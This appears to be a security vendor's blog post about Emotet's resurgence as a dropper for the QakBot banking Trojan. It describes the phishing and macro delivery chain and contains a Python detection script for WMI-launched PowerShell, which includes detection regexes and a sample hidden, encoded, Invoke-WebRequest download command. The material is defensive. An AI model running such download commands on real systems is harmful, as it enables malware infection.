Emotet is dead, long live Emotet? New threat from banking Trojan QakBot (QBot)

Barely more than half a year after Emotet's self-deletion, the botnet is now active again and spreading terror among financial institutions and service providers as the banking Trojan QakBot (QBot). Emotet, which just a few years ago was called the "king of malware" by Arne Schönbohm, President of the German Federal Office for Information Security (BSI), is notorious in the field of cybercrime, as BKA situation reports on cybercrime from previous years also testify.

Emotet started as a banking Trojan for illegally obtaining access credentials and evolved into a botnet over the years. After it had been quiet for some time, methods already known from Emotet resurfaced: tens of thousands of e-mails with links or file attachments containing malicious macros were distributed.

Up to 250,000 of these official-looking malware emails were circulated every day. Particularly perfidious, and already known from Emotet, is that these mails are often sent as replies to existing mail threads, so-called dynamite phishing. When a recipient opens the zip attachment or link, they are prompted to enable macros, which are disabled by default.

If the macros are enabled, Windows Management Instrumentation launches PowerShell to retrieve the Emotet binary from one of the compromised WordPress sites. After this initial infection, additional malware is downloaded, in the current case the banking Trojan QakBot. QakBot targets businesses, from which large sums of money are stolen after spying on users' banking activities.
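A detection sketch for the launch chain described above, added here as an example and not taken from the original article: it flags PowerShell processes whose parent is the WMI provider host (`WmiPrvSE.exe`) in process-creation events. The field names follow Sysmon Event ID 1; the sample events, host names, URL and command-line heuristics are constructed assumptions.

```python
import ntpath
import re

SHELLS = {"powershell.exe", "pwsh.exe"}
WMI_HOST = "wmiprvse.exe"  # WMI provider host: parent of processes created via WMI

# Command-line traits that raise priority; heuristics, not a complete list.
CMDLINE_HINTS = {
    "encoded command": re.compile(r"(?i)\s-e(nc\w*|c)?\s"),
    "hidden window": re.compile(r"(?i)\s-w\w*\s+hidden"),
    "network retrieval": re.compile(r"(?i)invoke-webrequest|net\.webclient|https?://"),
}

# Constructed process-creation events using Sysmon Event ID 1 field names.
# Hosts, URL and arguments are placeholders, not observed indicators.
SAMPLE_EVENTS = [
    {"host": "ws-01", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": "powershell -w hidden -enc PLACEHOLDER"},
    {"host": "ws-02", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell Get-ChildItem"},
    {"host": "ws-03", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": "powershell Invoke-WebRequest http://site.example/placeholder -OutFile p.bin"},
]

def triage(event):
    """Return the reasons an event matches; an empty list means no match."""
    child = ntpath.basename(event["Image"]).lower()
    parent = ntpath.basename(event["ParentImage"]).lower()
    # Core rule: the parent is the WMI provider host, not the Office application,
    # so a rule keyed only on an Office parent process would not see this launch.
    if child not in SHELLS or parent != WMI_HOST:
        return []
    reasons = ["powershell started by WMI provider host"]
    cmdline = event.get("CommandLine", "")
    reasons += [label for label, rx in CMDLINE_HINTS.items() if rx.search(cmdline)]
    return reasons

def scan(events):
    """Map host -> reasons for every event that matches the core rule."""
    return {e["host"]: r for e in events if (r := triage(e))}

if __name__ == "__main__":
    for host, reasons in scan(SAMPLE_EVENTS).items():
        print(host, "->", "; ".join(reasons))
```

Legitimate management tooling also starts PowerShell through WMI, so the command-line hints are there to rank matches, not to replace review of each one.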

How can you protect yourself from QakBot?

The quality of fake mails keeps improving, and they fit ever more convincingly into existing communication histories. A major source of danger is therefore the ill-considered opening of files and attachments and clicking on links in mails. As a result, there is an acute risk of infecting a company's entire network with malware or ransomware.

Secure your browser against network threats

Traditional security barriers such as antivirus software offer little protection against the perfidious attack patterns of botnets that spread emails with malicious links.

We therefore recommend the triple protection of

  • proactive security that protects against browser-based cyberattacks (APTs, zero-day exploits, ransomware)
  • protection against malware and data leaks through complete virtualization
  • secure separation of Internet, operating system and corporate network

You can learn more about this, for example, in our successful webinar "Emotet & Co. - Why you don't need to worry", which is also applicable to the current QakBot.

Or feel free to contact us. We will be happy to advise you on proactive protection options against zero-day exploits, ransomware, viruses and Trojans that arrive via the browser or the website visited.

By the way, Kaspersky has compiled a list of IP addresses of already known Qakbot C2 servers. If you can, monitor for suspicious activity involving them. Of course, we will be happy to advise you on this cybersecurity protection measure as well.
